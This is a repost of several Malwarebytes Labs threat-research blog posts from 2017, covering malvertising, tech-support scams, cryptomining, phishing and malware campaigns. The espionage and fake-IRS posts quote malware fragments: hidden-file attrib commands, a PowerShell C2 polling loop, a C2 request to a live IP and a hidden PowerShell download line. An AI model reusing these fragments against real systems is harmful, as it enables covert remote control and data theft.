Browsing articles in "Internet Security"
Sep 28, 2017
Comments Off on Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform which Microsoft signed a deal within 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a
Registrant Name: bhanu
Registrant Country: IN
Registrant Email:

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to shows similar bogus ‘news’ sites:


There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017
Comments Off on Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc
(Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:UserspublicdocumentsNTSTATS.ps1"
attrib +s +h "C:UserspublicdocumentsNTSTATS.vbs"

Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){
 getCommand $key
 start-sleep -Seconds 300

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/[removed]== HTTP/1.1
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected from antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would. 

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise







The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 26, 2017
Comments Off on Keychain vulnerability in macOS

Keychain vulnerability in macOS

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra since they involve theft of both the user’s password and the keychain files.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 25, 2017
Comments Off on Drive-by mining and ads: The Wild Wild West

Drive-by mining and ads: The Wild Wild West

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts or done via legitimate but compromised websites that are being injected with cryptomining code directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception here, in that in some cases, loading the JavaScript mining code once is enough, no matter whether the user decides to change site afterward, the mining will continue. This particular abuse technique affects Internet Explorer (i.e. the zombie script) and was identified and reported (but not fixed yet) by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which can be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This literally opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency

Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from normally closing your browser. The claims are always excessive and designed to scare users about made up infections. Victims that call the posted number for help end up with more computer issues and several hundreds of dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use SSL encryption (via free certificates from Let’s Encrypt). It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam



Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85

Terror EK


The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 25, 2017
Comments Off on A week in security (September 18 – September 24)

A week in security (September 18 – September 24)

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.


Consumer news

Business news


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 22, 2017
Comments Off on Netflix scam warning

Netflix scam warning

Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services that does not mean all the other emails are safe. Far from it. To demonstrate this point we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com and the content of the email informs us that there has been a problem with our last payment. Obviously to those of us who are not customers of Netflix this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing.

phishing mail


Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)


So the email asks us to fill out our payment details on a site. This should always be a red flag for everyone. A security-aware company does not provide you with a clickable button to their site. They will tell you to log into their site and provide you with instructions on how to proceed. They will not provide a direct link to a page with a form to fill out asking for billing information and what not.

Pay attention to

When you have to provide such details always look for the green padlock in the address bar of your browser.

green padlock

Remember that the green padlock is not the sole condition, but it is a must before you proceed.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they usually link to the actual layout and images of the website they are pretending to be.


The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.


Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 21, 2017
Comments Off on Don’t let these gaming threats give you a Game Over

Don’t let these gaming threats give you a Game Over

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).


gta fake

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

steam uploader

Read: Something’s phishy: How to detect phishing attempts


The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking, to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, Streaming is a bit of a dangerous past-time.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally, or licensed music has been replaced, or the control scheme is different, or maybe it works on this console but not that mobile properly, and anyway its funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

fake emulator

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 21, 2017
Comments Off on Fake IRS notice delivers customized spying tool

Fake IRS notice delivers customized spying tool

While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.


-WindowStyle Hidden (New-Object System.Net.WebClient)


The downloaded payload (intelgfx.exe) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199


HTA script


Main package (intelgfx.exe)


RAT module


Other IOCs from same distribution server


The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
Comments Off on FTC providing partial refunds for Advanced Tech Support victims

FTC providing partial refunds for Advanced Tech Support victims

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
Comments Off on A week in security (September 11 – September 17)

A week in security (September 11 – September 17)

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Powered by WPeMatico


Location and hours

Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo